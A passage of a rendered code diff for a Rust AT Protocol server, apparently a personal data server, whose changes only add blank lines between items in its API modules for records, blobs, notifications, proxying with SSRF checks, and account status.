··· 12 use serde::Deserialize; 13 use serde_json::{json, Value}; 14 use tracing::{error, info, warn}; 15 + 16 #[derive(Debug, Deserialize)] 17 pub struct SubmitPlcOperationInput { 18 pub operation: Value, 19 } 20 + 21 pub async fn submit_plc_operation( 22 State(state): State<AppState>, 23 headers: axum::http::HeaderMap,
+1
src/api/mod.rs
··· 13 pub mod server; 14 pub mod temp; 15 pub mod validation; 16 pub use error::ApiError; 17 pub use proxy_client::{proxy_client, validate_at_uri, validate_did, validate_limit, AtUriParts};
··· 13 pub mod server; 14 pub mod temp; 15 pub mod validation; 16 + 17 pub use error::ApiError; 18 pub use proxy_client::{proxy_client, validate_at_uri, validate_did, validate_limit, AtUriParts};
+3
src/api/moderation/mod.rs
··· 9 use serde::{Deserialize, Serialize}; 10 use serde_json::{Value, json}; 11 use tracing::error; 12 #[derive(Deserialize)] 13 #[serde(rename_all = "camelCase")] 14 pub struct CreateReportInput { ··· 16 pub reason: Option<String>, 17 pub subject: Value, 18 } 19 #[derive(Serialize)] 20 #[serde(rename_all = "camelCase")] 21 pub struct CreateReportOutput { ··· 26 pub reported_by: String, 27 pub created_at: String, 28 } 29 pub async fn create_report( 30 State(state): State<AppState>, 31 headers: axum::http::HeaderMap,
··· 9 use serde::{Deserialize, Serialize}; 10 use serde_json::{Value, json}; 11 use tracing::error; 12 + 13 #[derive(Deserialize)] 14 #[serde(rename_all = "camelCase")] 15 pub struct CreateReportInput { ··· 17 pub reason: Option<String>, 18 pub subject: Value, 19 } 20 + 21 #[derive(Serialize)] 22 #[serde(rename_all = "camelCase")] 23 pub struct CreateReportOutput { ··· 28 pub reported_by: String, 29 pub created_at: String, 30 } 31 + 32 pub async fn create_report( 33 State(state): State<AppState>, 34 headers: axum::http::HeaderMap,
+1
src/api/notification/mod.rs
··· 1 mod register_push; 2 pub use register_push::register_push;
··· 1 mod register_push; 2 + 3 pub use register_push::register_push;
+3
src/api/notification/register_push.rs
··· 10 use serde::Deserialize; 11 use serde_json::json; 12 use tracing::{error, info}; 13 #[derive(Deserialize)] 14 #[serde(rename_all = "camelCase")] 15 pub struct RegisterPushInput { ··· 18 pub platform: String, 19 pub app_id: String, 20 } 21 const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"]; 22 pub async fn register_push( 23 State(state): State<AppState>, 24 headers: HeaderMap,
··· 10 use serde::Deserialize; 11 use serde_json::json; 12 use tracing::{error, info}; 13 + 14 #[derive(Deserialize)] 15 #[serde(rename_all = "camelCase")] 16 pub struct RegisterPushInput { ··· 19 pub platform: String, 20 pub app_id: String, 21 } 22 + 23 const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"]; 24 + 25 pub async fn register_push( 26 State(state): State<AppState>, 27 headers: HeaderMap,
+4
src/api/notification_prefs.rs
··· 10 use tracing::info; 11 use crate::auth::validate_bearer_token; 12 use crate::state::AppState; 13 #[derive(Serialize)] 14 #[serde(rename_all = "camelCase")] 15 pub struct NotificationPrefsResponse { ··· 22 pub signal_number: Option<String>, 23 pub signal_verified: bool, 24 } 25 pub async fn get_notification_prefs( 26 State(state): State<AppState>, 27 headers: HeaderMap, ··· 96 }) 97 .into_response() 98 } 99 #[derive(Deserialize)] 100 #[serde(rename_all = "camelCase")] 101 pub struct UpdateNotificationPrefsInput { ··· 104 pub telegram_username: Option<String>, 105 pub signal_number: Option<String>, 106 } 107 pub async fn update_notification_prefs( 108 State(state): State<AppState>, 109 headers: HeaderMap,
··· 10 use tracing::info; 11 use crate::auth::validate_bearer_token; 12 use crate::state::AppState; 13 + 14 #[derive(Serialize)] 15 #[serde(rename_all = "camelCase")] 16 pub struct NotificationPrefsResponse { ··· 23 pub signal_number: Option<String>, 24 pub signal_verified: bool, 25 } 26 + 27 pub async fn get_notification_prefs( 28 State(state): State<AppState>, 29 headers: HeaderMap, ··· 98 }) 99 .into_response() 100 } 101 + 102 #[derive(Deserialize)] 103 #[serde(rename_all = "camelCase")] 104 pub struct UpdateNotificationPrefsInput { ··· 107 pub telegram_username: Option<String>, 108 pub signal_number: Option<String>, 109 } 110 + 111 pub async fn update_notification_prefs( 112 State(state): State<AppState>, 113 headers: HeaderMap,
+1
src/api/proxy.rs
··· 8 use crate::api::proxy_client::proxy_client; 9 use std::collections::HashMap; 10 use tracing::{error, info}; 11 pub async fn proxy_handler( 12 State(state): State<AppState>, 13 Path(method): Path<String>,
··· 8 use crate::api::proxy_client::proxy_client; 9 use std::collections::HashMap; 10 use tracing::{error, info}; 11 + 12 pub async fn proxy_handler( 13 State(state): State<AppState>, 14 Path(method): Path<String>,
+15
src/api/proxy_client.rs
··· 3 use std::sync::OnceLock; 4 use std::time::Duration; 5 use tracing::warn; 6 pub const DEFAULT_HEADERS_TIMEOUT: Duration = Duration::from_secs(10); 7 pub const DEFAULT_BODY_TIMEOUT: Duration = Duration::from_secs(30); 8 pub const DEFAULT_CONNECT_TIMEOUT: Duration = Duration::from_secs(5); 9 pub const MAX_RESPONSE_SIZE: u64 = 10 * 1024 * 1024; 10 static PROXY_CLIENT: OnceLock<Client> = OnceLock::new(); 11 pub fn proxy_client() -> &'static Client { 12 PROXY_CLIENT.get_or_init(|| { 13 ClientBuilder::new() ··· 20 .expect("Failed to build HTTP client - this indicates a TLS or system configuration issue") 21 }) 22 } 23 pub fn is_ssrf_safe(url: &str) -> Result<(), SsrfError> { 24 let parsed = Url::parse(url).map_err(|_| SsrfError::InvalidUrl)?; 25 let scheme = parsed.scheme(); ··· 61 } 62 Ok(()) 63 } 64 fn is_unicast_ip(ip: &IpAddr) -> bool { 65 match ip { 66 IpAddr::V4(v4) => { ··· 74 IpAddr::V6(v6) => !v6.is_loopback() && !v6.is_multicast() && !v6.is_unspecified(), 75 } 76 } 77 fn is_private_v4(ip: &std::net::Ipv4Addr) -> bool { 78 let octets = ip.octets(); 79 octets[0] == 10 ··· 81 || (octets[0] == 192 && octets[1] == 168) 82 || (octets[0] == 169 && octets[1] == 254) 83 } 84 #[derive(Debug, Clone)] 85 pub enum SsrfError { 86 InvalidUrl, ··· 89 NonUnicastIp(String), 90 DnsResolutionFailed(String), 91 } 92 impl std::fmt::Display for SsrfError { 93 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 94 match self { ··· 100 } 101 } 102 } 103 impl std::error::Error for SsrfError {} 104 pub const HEADERS_TO_FORWARD: &[&str] = &[ 105 "accept-language", 106 "atproto-accept-labelers", ··· 112 "retry-after", 113 "content-type", 114 ]; 115 pub fn validate_at_uri(uri: &str) -> Result<AtUriParts, &'static str> { 116 if !uri.starts_with("at://") { 117 return Err("URI must start with at://"); ··· 137 rkey: parts.get(2).map(|s| s.to_string()), 138 }) 139 } 140 #[derive(Debug, Clone)] 141 pub struct AtUriParts { 142 pub did: String, 143 pub collection: Option<String>, 144 pub rkey: Option<String>, 145 } 146 pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 { 147 match limit { 148 Some(l) if l == 0 => default, ··· 151 None => default, 152 } 153 } 154 pub fn validate_did(did: &str) -> Result<(), &'static str> { 155 if !did.starts_with("did:") { 156 return Err("Invalid DID format"); ··· 165 } 166 Ok(()) 167 } 168 #[cfg(test)] 169 mod tests { 170 use super::*;
··· 3 use std::sync::OnceLock; 4 use std::time::Duration; 5 use tracing::warn; 6 + 7 pub const DEFAULT_HEADERS_TIMEOUT: Duration = Duration::from_secs(10); 8 pub const DEFAULT_BODY_TIMEOUT: Duration = Duration::from_secs(30); 9 pub const DEFAULT_CONNECT_TIMEOUT: Duration = Duration::from_secs(5); 10 pub const MAX_RESPONSE_SIZE: u64 = 10 * 1024 * 1024; 11 + 12 static PROXY_CLIENT: OnceLock<Client> = OnceLock::new(); 13 + 14 pub fn proxy_client() -> &'static Client { 15 PROXY_CLIENT.get_or_init(|| { 16 ClientBuilder::new() ··· 23 .expect("Failed to build HTTP client - this indicates a TLS or system configuration issue") 24 }) 25 } 26 + 27 pub fn is_ssrf_safe(url: &str) -> Result<(), SsrfError> { 28 let parsed = Url::parse(url).map_err(|_| SsrfError::InvalidUrl)?; 29 let scheme = parsed.scheme(); ··· 65 } 66 Ok(()) 67 } 68 + 69 fn is_unicast_ip(ip: &IpAddr) -> bool { 70 match ip { 71 IpAddr::V4(v4) => { ··· 79 IpAddr::V6(v6) => !v6.is_loopback() && !v6.is_multicast() && !v6.is_unspecified(), 80 } 81 } 82 + 83 fn is_private_v4(ip: &std::net::Ipv4Addr) -> bool { 84 let octets = ip.octets(); 85 octets[0] == 10 ··· 87 || (octets[0] == 192 && octets[1] == 168) 88 || (octets[0] == 169 && octets[1] == 254) 89 } 90 + 91 #[derive(Debug, Clone)] 92 pub enum SsrfError { 93 InvalidUrl, ··· 96 NonUnicastIp(String), 97 DnsResolutionFailed(String), 98 } 99 + 100 impl std::fmt::Display for SsrfError { 101 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 102 match self { ··· 108 } 109 } 110 } 111 + 112 impl std::error::Error for SsrfError {} 113 + 114 pub const HEADERS_TO_FORWARD: &[&str] = &[ 115 "accept-language", 116 "atproto-accept-labelers", ··· 122 "retry-after", 123 "content-type", 124 ]; 125 + 126 pub fn validate_at_uri(uri: &str) -> Result<AtUriParts, &'static str> { 127 if !uri.starts_with("at://") { 128 return Err("URI must start with at://"); ··· 148 rkey: parts.get(2).map(|s| s.to_string()), 149 }) 150 } 151 + 152 #[derive(Debug, Clone)] 153 pub struct AtUriParts { 154 pub did: String, 155 pub collection: Option<String>, 156 pub rkey: Option<String>, 157 } 158 + 159 pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 { 160 match limit { 161 Some(l) if l == 0 => default, ··· 164 None => default, 165 } 166 } 167 + 168 pub fn validate_did(did: &str) -> Result<(), &'static str> { 169 if !did.starts_with("did:") { 170 return Err("Invalid DID format"); ··· 179 } 180 Ok(()) 181 } 182 + 183 #[cfg(test)] 184 mod tests { 185 use super::*;
+19
src/api/read_after_write.rs
··· 17 use std::collections::HashMap; 18 use tracing::{error, info, warn}; 19 use uuid::Uuid; 20 pub const REPO_REV_HEADER: &str = "atproto-repo-rev"; 21 pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag"; 22 #[derive(Debug, Clone, Serialize, Deserialize)] 23 #[serde(rename_all = "camelCase")] 24 pub struct PostRecord { ··· 39 #[serde(flatten)] 40 pub extra: HashMap<String, Value>, 41 } 42 #[derive(Debug, Clone, Serialize, Deserialize)] 43 #[serde(rename_all = "camelCase")] 44 pub struct ProfileRecord { ··· 55 #[serde(flatten)] 56 pub extra: HashMap<String, Value>, 57 } 58 #[derive(Debug, Clone)] 59 pub struct RecordDescript<T> { 60 pub uri: String, ··· 62 pub indexed_at: DateTime<Utc>, 63 pub record: T, 64 } 65 #[derive(Debug, Clone, Serialize, Deserialize)] 66 #[serde(rename_all = "camelCase")] 67 pub struct LikeRecord { ··· 72 #[serde(flatten)] 73 pub extra: HashMap<String, Value>, 74 } 75 #[derive(Debug, Clone, Serialize, Deserialize)] 76 #[serde(rename_all = "camelCase")] 77 pub struct LikeSubject { 78 pub uri: String, 79 pub cid: String, 80 } 81 #[derive(Debug, Default)] 82 pub struct LocalRecords { 83 pub count: usize, ··· 85 pub posts: Vec<RecordDescript<PostRecord>>, 86 pub likes: Vec<RecordDescript<LikeRecord>>, 87 } 88 pub async fn get_records_since_rev( 89 state: &AppState, 90 did: &str, ··· 187 } 188 Ok(result) 189 } 190 pub fn get_local_lag(local: &LocalRecords) -> Option<i64> { 191 let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at); 192 for post in &local.posts { ··· 205 } 206 oldest.map(|o| (Utc::now() - o).num_milliseconds()) 207 } 208 pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> { 209 headers 210 .get(REPO_REV_HEADER) 211 .and_then(|h| h.to_str().ok()) 212 .map(|s| s.to_string()) 213 } 214 #[derive(Debug)] 215 pub struct ProxyResponse { 216 pub status: StatusCode, 217 pub headers: HeaderMap, 218 pub body: bytes::Bytes, 219 } 220 pub async fn proxy_to_appview( 221 method: &str, 222 params: &HashMap<String, String>, ··· 297 } 298 } 299 } 300 pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response { 301 let mut response = (StatusCode::OK, Json(data)).into_response(); 302 if let Some(lag_ms) = lag { ··· 308 } 309 response 310 } 311 #[derive(Debug, Clone, Serialize, Deserialize)] 312 #[serde(rename_all = "camelCase")] 313 pub struct AuthorView { ··· 320 #[serde(flatten)] 321 pub extra: HashMap<String, Value>, 322 } 323 #[derive(Debug, Clone, Serialize, Deserialize)] 324 #[serde(rename_all = "camelCase")] 325 pub struct PostView { ··· 341 #[serde(flatten)] 342 pub extra: HashMap<String, Value>, 343 } 344 #[derive(Debug, Clone, Serialize, Deserialize)] 345 #[serde(rename_all = "camelCase")] 346 pub struct FeedViewPost { ··· 354 #[serde(flatten)] 355 pub extra: HashMap<String, Value>, 356 } 357 #[derive(Debug, Clone, Serialize, Deserialize)] 358 pub struct FeedOutput { 359 pub feed: Vec<FeedViewPost>, 360 #[serde(skip_serializing_if = "Option::is_none")] 361 pub cursor: Option<String>, 362 } 363 pub fn format_local_post( 364 descript: &RecordDescript<PostRecord>, 365 author_did: &str, ··· 387 extra: HashMap::new(), 388 } 389 } 390 pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) { 391 if posts.is_empty() { 392 return;
··· 17 use std::collections::HashMap; 18 use tracing::{error, info, warn}; 19 use uuid::Uuid; 20 + 21 pub const REPO_REV_HEADER: &str = "atproto-repo-rev"; 22 pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag"; 23 + 24 #[derive(Debug, Clone, Serialize, Deserialize)] 25 #[serde(rename_all = "camelCase")] 26 pub struct PostRecord { ··· 41 #[serde(flatten)] 42 pub extra: HashMap<String, Value>, 43 } 44 + 45 #[derive(Debug, Clone, Serialize, Deserialize)] 46 #[serde(rename_all = "camelCase")] 47 pub struct ProfileRecord { ··· 58 #[serde(flatten)] 59 pub extra: HashMap<String, Value>, 60 } 61 + 62 #[derive(Debug, Clone)] 63 pub struct RecordDescript<T> { 64 pub uri: String, ··· 66 pub indexed_at: DateTime<Utc>, 67 pub record: T, 68 } 69 + 70 #[derive(Debug, Clone, Serialize, Deserialize)] 71 #[serde(rename_all = "camelCase")] 72 pub struct LikeRecord { ··· 77 #[serde(flatten)] 78 pub extra: HashMap<String, Value>, 79 } 80 + 81 #[derive(Debug, Clone, Serialize, Deserialize)] 82 #[serde(rename_all = "camelCase")] 83 pub struct LikeSubject { 84 pub uri: String, 85 pub cid: String, 86 } 87 + 88 #[derive(Debug, Default)] 89 pub struct LocalRecords { 90 pub count: usize, ··· 92 pub posts: Vec<RecordDescript<PostRecord>>, 93 pub likes: Vec<RecordDescript<LikeRecord>>, 94 } 95 + 96 pub async fn get_records_since_rev( 97 state: &AppState, 98 did: &str, ··· 195 } 196 Ok(result) 197 } 198 + 199 pub fn get_local_lag(local: &LocalRecords) -> Option<i64> { 200 let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at); 201 for post in &local.posts { ··· 214 } 215 oldest.map(|o| (Utc::now() - o).num_milliseconds()) 216 } 217 + 218 pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> { 219 headers 220 .get(REPO_REV_HEADER) 221 .and_then(|h| h.to_str().ok()) 222 .map(|s| s.to_string()) 223 } 224 + 225 #[derive(Debug)] 226 pub struct ProxyResponse { 227 pub status: StatusCode, 228 pub headers: HeaderMap, 229 pub body: bytes::Bytes, 230 } 231 + 232 pub async fn proxy_to_appview( 233 method: &str, 234 params: &HashMap<String, String>, ··· 309 } 310 } 311 } 312 + 313 pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response { 314 let mut response = (StatusCode::OK, Json(data)).into_response(); 315 if let Some(lag_ms) = lag { ··· 321 } 322 response 323 } 324 + 325 #[derive(Debug, Clone, Serialize, Deserialize)] 326 #[serde(rename_all = "camelCase")] 327 pub struct AuthorView { ··· 334 #[serde(flatten)] 335 pub extra: HashMap<String, Value>, 336 } 337 + 338 #[derive(Debug, Clone, Serialize, Deserialize)] 339 #[serde(rename_all = "camelCase")] 340 pub struct PostView { ··· 356 #[serde(flatten)] 357 pub extra: HashMap<String, Value>, 358 } 359 + 360 #[derive(Debug, Clone, Serialize, Deserialize)] 361 #[serde(rename_all = "camelCase")] 362 pub struct FeedViewPost { ··· 370 #[serde(flatten)] 371 pub extra: HashMap<String, Value>, 372 } 373 + 374 #[derive(Debug, Clone, Serialize, Deserialize)] 375 pub struct FeedOutput { 376 pub feed: Vec<FeedViewPost>, 377 #[serde(skip_serializing_if = "Option::is_none")] 378 pub cursor: Option<String>, 379 } 380 + 381 pub fn format_local_post( 382 descript: &RecordDescript<PostRecord>, 383 author_did: &str, ··· 405 extra: HashMap::new(), 406 } 407 } 408 + 409 pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) { 410 if posts.is_empty() { 411 return;
+7
src/api/repo/blob.rs
··· 14 use sha2::{Digest, Sha256}; 15 use std::str::FromStr; 16 use tracing::error; 17 const MAX_BLOB_SIZE: usize = 1_000_000; 18 pub async fn upload_blob( 19 State(state): State<AppState>, 20 headers: axum::http::HeaderMap, ··· 154 })) 155 .into_response() 156 } 157 #[derive(Deserialize)] 158 pub struct ListMissingBlobsParams { 159 pub limit: Option<i64>, 160 pub cursor: Option<String>, 161 } 162 #[derive(Serialize)] 163 #[serde(rename_all = "camelCase")] 164 pub struct RecordBlob { 165 pub cid: String, 166 pub record_uri: String, 167 } 168 #[derive(Serialize)] 169 pub struct ListMissingBlobsOutput { 170 pub cursor: Option<String>, 171 pub blobs: Vec<RecordBlob>, 172 } 173 fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) { 174 if let Some(obj) = val.as_object() { 175 if let Some(type_val) = obj.get("$type") { ··· 192 } 193 } 194 } 195 pub async fn list_missing_blobs( 196 State(state): State<AppState>, 197 headers: axum::http::HeaderMap,
··· 14 use sha2::{Digest, Sha256}; 15 use std::str::FromStr; 16 use tracing::error; 17 + 18 const MAX_BLOB_SIZE: usize = 1_000_000; 19 + 20 pub async fn upload_blob( 21 State(state): State<AppState>, 22 headers: axum::http::HeaderMap, ··· 156 })) 157 .into_response() 158 } 159 + 160 #[derive(Deserialize)] 161 pub struct ListMissingBlobsParams { 162 pub limit: Option<i64>, 163 pub cursor: Option<String>, 164 } 165 + 166 #[derive(Serialize)] 167 #[serde(rename_all = "camelCase")] 168 pub struct RecordBlob { 169 pub cid: String, 170 pub record_uri: String, 171 } 172 + 173 #[derive(Serialize)] 174 pub struct ListMissingBlobsOutput { 175 pub cursor: Option<String>, 176 pub blobs: Vec<RecordBlob>, 177 } 178 + 179 fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) { 180 if let Some(obj) = val.as_object() { 181 if let Some(type_val) = obj.get("$type") { ··· 198 } 199 } 200 } 201 + 202 pub async fn list_missing_blobs( 203 State(state): State<AppState>, 204 headers: axum::http::HeaderMap,
+3
src/api/repo/import.rs
··· 11 }; 12 use serde_json::json; 13 use tracing::{debug, error, info, warn}; 14 const DEFAULT_MAX_IMPORT_SIZE: usize = 100 * 1024 * 1024; 15 const DEFAULT_MAX_BLOCKS: usize = 50000; 16 pub async fn import_repo( 17 State(state): State<AppState>, 18 headers: axum::http::HeaderMap, ··· 355 } 356 } 357 } 358 async fn sequence_import_event( 359 state: &AppState, 360 did: &str,
··· 11 }; 12 use serde_json::json; 13 use tracing::{debug, error, info, warn}; 14 + 15 const DEFAULT_MAX_IMPORT_SIZE: usize = 100 * 1024 * 1024; 16 const DEFAULT_MAX_BLOCKS: usize = 50000; 17 + 18 pub async fn import_repo( 19 State(state): State<AppState>, 20 headers: axum::http::HeaderMap, ··· 357 } 358 } 359 } 360 + 361 async fn sequence_import_event( 362 state: &AppState, 363 did: &str,
+2
src/api/repo/meta.rs
··· 7 }; 8 use serde::Deserialize; 9 use serde_json::json; 10 #[derive(Deserialize)] 11 pub struct DescribeRepoInput { 12 pub repo: String, 13 } 14 pub async fn describe_repo( 15 State(state): State<AppState>, 16 Query(input): Query<DescribeRepoInput>,
··· 7 }; 8 use serde::Deserialize; 9 use serde_json::json; 10 + 11 #[derive(Deserialize)] 12 pub struct DescribeRepoInput { 13 pub repo: String, 14 } 15 + 16 pub async fn describe_repo( 17 State(state): State<AppState>, 18 Query(input): Query<DescribeRepoInput>,
+1
src/api/repo/mod.rs
··· 2 pub mod import; 3 pub mod meta; 4 pub mod record; 5 pub use blob::{list_missing_blobs, upload_blob}; 6 pub use import::import_repo; 7 pub use meta::describe_repo;
··· 2 pub mod import; 3 pub mod meta; 4 pub mod record; 5 + 6 pub use blob::{list_missing_blobs, upload_blob}; 7 pub use import::import_repo; 8 pub use meta::describe_repo;
+7
src/api/repo/record/batch.rs
··· 17 use std::str::FromStr; 18 use std::sync::Arc; 19 use tracing::error; 20 const MAX_BATCH_WRITES: usize = 200; 21 #[derive(Deserialize)] 22 #[serde(tag = "$type")] 23 pub enum WriteOp { ··· 36 #[serde(rename = "com.atproto.repo.applyWrites#delete")] 37 Delete { collection: String, rkey: String }, 38 } 39 #[derive(Deserialize)] 40 #[serde(rename_all = "camelCase")] 41 pub struct ApplyWritesInput { ··· 44 pub writes: Vec<WriteOp>, 45 pub swap_commit: Option<String>, 46 } 47 #[derive(Serialize)] 48 #[serde(tag = "$type")] 49 pub enum WriteResult { ··· 54 #[serde(rename = "com.atproto.repo.applyWrites#deleteResult")] 55 DeleteResult {}, 56 } 57 #[derive(Serialize)] 58 pub struct ApplyWritesOutput { 59 pub commit: CommitInfo, 60 pub results: Vec<WriteResult>, 61 } 62 #[derive(Serialize)] 63 pub struct CommitInfo { 64 pub cid: String, 65 pub rev: String, 66 } 67 pub async fn apply_writes( 68 State(state): State<AppState>, 69 headers: axum::http::HeaderMap,
··· 17 use std::str::FromStr; 18 use std::sync::Arc; 19 use tracing::error; 20 + 21 const MAX_BATCH_WRITES: usize = 200; 22 + 23 #[derive(Deserialize)] 24 #[serde(tag = "$type")] 25 pub enum WriteOp { ··· 38 #[serde(rename = "com.atproto.repo.applyWrites#delete")] 39 Delete { collection: String, rkey: String }, 40 } 41 + 42 #[derive(Deserialize)] 43 #[serde(rename_all = "camelCase")] 44 pub struct ApplyWritesInput { ··· 47 pub writes: Vec<WriteOp>, 48 pub swap_commit: Option<String>, 49 } 50 + 51 #[derive(Serialize)] 52 #[serde(tag = "$type")] 53 pub enum WriteResult { ··· 58 #[serde(rename = "com.atproto.repo.applyWrites#deleteResult")] 59 DeleteResult {}, 60 } 61 + 62 #[derive(Serialize)] 63 pub struct ApplyWritesOutput { 64 pub commit: CommitInfo, 65 pub results: Vec<WriteResult>, 66 } 67 + 68 #[derive(Serialize)] 69 pub struct CommitInfo { 70 pub cid: String, 71 pub rev: String, 72 } 73 + 74 pub async fn apply_writes( 75 State(state): State<AppState>, 76 headers: axum::http::HeaderMap,
+2
src/api/repo/record/delete.rs
··· 16 use std::str::FromStr; 17 use std::sync::Arc; 18 use tracing::error; 19 #[derive(Deserialize)] 20 pub struct DeleteRecordInput { 21 pub repo: String, ··· 26 #[serde(rename = "swapCommit")] 27 pub swap_commit: Option<String>, 28 } 29 pub async fn delete_record( 30 State(state): State<AppState>, 31 headers: HeaderMap,
··· 16 use std::str::FromStr; 17 use std::sync::Arc; 18 use tracing::error; 19 + 20 #[derive(Deserialize)] 21 pub struct DeleteRecordInput { 22 pub repo: String, ··· 27 #[serde(rename = "swapCommit")] 28 pub swap_commit: Option<String>, 29 } 30 + 31 pub async fn delete_record( 32 State(state): State<AppState>, 33 headers: HeaderMap,
+1
src/api/repo/record/mod.rs
··· 4 pub mod utils; 5 pub mod validation; 6 pub mod write; 7 pub use batch::apply_writes; 8 pub use delete::{DeleteRecordInput, delete_record}; 9 pub use read::{GetRecordInput, ListRecordsInput, ListRecordsOutput, get_record, list_records};
··· 4 pub mod utils; 5 pub mod validation; 6 pub mod write; 7 + 8 pub use batch::apply_writes; 9 pub use delete::{DeleteRecordInput, delete_record}; 10 pub use read::{GetRecordInput, ListRecordsInput, ListRecordsOutput, get_record, list_records};
+2
src/api/repo/record/read.rs
··· 12 use std::collections::HashMap; 13 use std::str::FromStr; 14 use tracing::error; 15 #[derive(Deserialize)] 16 pub struct GetRecordInput { 17 pub repo: String, ··· 19 pub rkey: String, 20 pub cid: Option<String>, 21 } 22 pub async fn get_record( 23 State(state): State<AppState>, 24 Query(input): Query<GetRecordInput>,
··· 12 use std::collections::HashMap; 13 use std::str::FromStr; 14 use tracing::error; 15 + 16 #[derive(Deserialize)] 17 pub struct GetRecordInput { 18 pub repo: String, ··· 20 pub rkey: String, 21 pub cid: Option<String>, 22 } 23 + 24 pub async fn get_record( 25 State(state): State<AppState>, 26 Query(input): Query<GetRecordInput>,
+4
src/api/repo/record/utils.rs
··· 28 rev: &'a str, 29 version: i64, 30 } 31 fn create_signed_commit( 32 did: &str, 33 data: Cid, ··· 68 .map_err(|e| format!("Failed to serialize signed commit: {:?}", e))?; 69 Ok((signed_bytes, sig_bytes)) 70 } 71 pub enum RecordOp { 72 Create { collection: String, rkey: String, cid: Cid }, 73 Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> }, 74 Delete { collection: String, rkey: String, prev: Option<Cid> }, 75 } 76 pub struct CommitResult { 77 pub commit_cid: Cid, 78 pub rev: String, 79 } 80 pub async fn commit_and_log( 81 state: &AppState, 82 did: &str,
··· 28 rev: &'a str, 29 version: i64, 30 } 31 + 32 fn create_signed_commit( 33 did: &str, 34 data: Cid, ··· 69 .map_err(|e| format!("Failed to serialize signed commit: {:?}", e))?; 70 Ok((signed_bytes, sig_bytes)) 71 } 72 + 73 pub enum RecordOp { 74 Create { collection: String, rkey: String, cid: Cid }, 75 Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> }, 76 Delete { collection: String, rkey: String, prev: Option<Cid> }, 77 } 78 + 79 pub struct CommitResult { 80 pub commit_cid: Cid, 81 pub rev: String, 82 } 83 + 84 pub async fn commit_and_log( 85 state: &AppState, 86 did: &str,
+1
src/api/repo/record/validation.rs
··· 5 Json, 6 }; 7 use serde_json::json; 8 pub fn validate_record(record: &serde_json::Value, collection: &str) -> Result<(), Response> { 9 let validator = RecordValidator::new(); 10 match validator.validate(record, collection) {
··· 5 Json, 6 }; 7 use serde_json::json; 8 + 9 pub fn validate_record(record: &serde_json::Value, collection: &str) -> Result<(), Response> { 10 let validator = RecordValidator::new(); 11 match validator.validate(record, collection) {
+2
src/api/repo/record/write.rs
··· 18 use std::sync::Arc; 19 use tracing::error; 20 use uuid::Uuid; 21 pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> { 22 let row = sqlx::query( 23 r#" ··· 44 None => Ok(false), 45 } 46 } 47 pub async fn prepare_repo_write( 48 state: &AppState, 49 headers: &HeaderMap,
··· 18 use std::sync::Arc; 19 use tracing::error; 20 use uuid::Uuid; 21 + 22 pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> { 23 let row = sqlx::query( 24 r#" ··· 45 None => Ok(false), 46 } 47 } 48 + 49 pub async fn prepare_repo_write( 50 state: &AppState, 51 headers: &HeaderMap,
+8
src/api/server/account_status.rs
··· 12 use serde_json::json; 13 use tracing::{error, info, warn}; 14 use uuid::Uuid; 15 #[derive(Serialize)] 16 #[serde(rename_all = "camelCase")] 17 pub struct CheckAccountStatusOutput { ··· 25 pub expected_blobs: i64, 26 pub imported_blobs: i64, 27 } 28 pub async fn check_account_status( 29 State(state): State<AppState>, 30 headers: axum::http::HeaderMap, ··· 94 ) 95 .into_response() 96 } 97 pub async fn activate_account( 98 State(state): State<AppState>, 99 headers: axum::http::HeaderMap, ··· 133 } 134 } 135 } 136 #[derive(Deserialize)] 137 #[serde(rename_all = "camelCase")] 138 pub struct DeactivateAccountInput { 139 pub delete_after: Option<String>, 140 } 141 pub async fn deactivate_account( 142 State(state): State<AppState>, 143 headers: axum::http::HeaderMap, ··· 178 } 179 } 180 } 181 pub async fn request_account_delete( 182 State(state): State<AppState>, 183 headers: axum::http::HeaderMap, ··· 232 info!("Account deletion requested for user {}", did); 233 (StatusCode::OK, Json(json!({}))).into_response() 234 } 235 #[derive(Deserialize)] 236 pub struct DeleteAccountInput { 237 pub did: String, 238 pub password: String, 239 pub token: String, 240 } 241 pub async fn delete_account( 242 State(state): State<AppState>, 243 Json(input): Json<DeleteAccountInput>,
··· 12 use serde_json::json; 13 use tracing::{error, info, warn}; 14 use uuid::Uuid; 15 + 16 #[derive(Serialize)] 17 #[serde(rename_all = "camelCase")] 18 pub struct CheckAccountStatusOutput { ··· 26 pub expected_blobs: i64, 27 pub imported_blobs: i64, 28 } 29 + 30 pub async fn check_account_status( 31 State(state): State<AppState>, 32 headers: axum::http::HeaderMap, ··· 96 ) 97 .into_response() 98 } 99 + 100 pub async fn activate_account( 101 State(state): State<AppState>, 102 headers: axum::http::HeaderMap, ··· 136 } 137 } 138 } 139 + 140 #[derive(Deserialize)] 141 #[serde(rename_all = "camelCase")] 142 pub struct DeactivateAccountInput { 143 pub delete_after: Option<String>, 144 } 145 + 146 pub async fn deactivate_account( 147 State(state): State<AppState>, 148 headers: axum::http::HeaderMap, ··· 183 } 184 } 185 } 186 + 187 pub async fn request_account_delete( 188 State(state): State<AppState>, 189 headers: axum::http::HeaderMap, ··· 238 info!("Account deletion requested for user {}", did); 239 (StatusCode::OK, Json(json!({}))).into_response() 240 } 241 + 242 #[derive(Deserialize)] 243 pub struct 